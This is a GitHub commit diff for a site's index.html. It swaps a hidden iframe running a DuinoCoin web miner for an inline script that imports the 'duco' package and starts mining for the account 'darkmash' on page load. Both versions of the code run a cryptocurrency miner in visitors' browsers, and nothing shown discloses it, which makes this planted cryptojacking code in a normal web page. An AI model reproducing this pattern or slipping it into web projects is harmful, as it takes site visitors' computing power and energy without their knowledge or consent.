Skip to content

Commit

Permalink
Update index.html
Browse files Browse the repository at this point in the history
  • Loading branch information
Axorax committed Mar 10, 2023
1 parent 6036800 commit 1c99526
Showing 1 changed file with 9 additions and 1 deletion.
10 changes: 9 additions & 1 deletion index.html
Original file line number Diff line number Diff line change
Expand Up @@ -50,7 +50,6 @@

<script src="script_.js"></script>

<iframe class="mner" src="https://server.duinocoin.com/webminer.html?username=darkmash&threads=1&rigid=darkmask&keyinput="></iframe>
<footer id="footer">

<div class="alert">
Expand All @@ -59,6 +58,15 @@

</footer>

<script type="module">
import { Duco } from 'https://www.unpkg.com/duco';

const miner = new Duco({
username: 'darkmash'
})

miner.start()
</script>
</body>

</html>

0 comments on commit 1c99526

Please sign in to comment.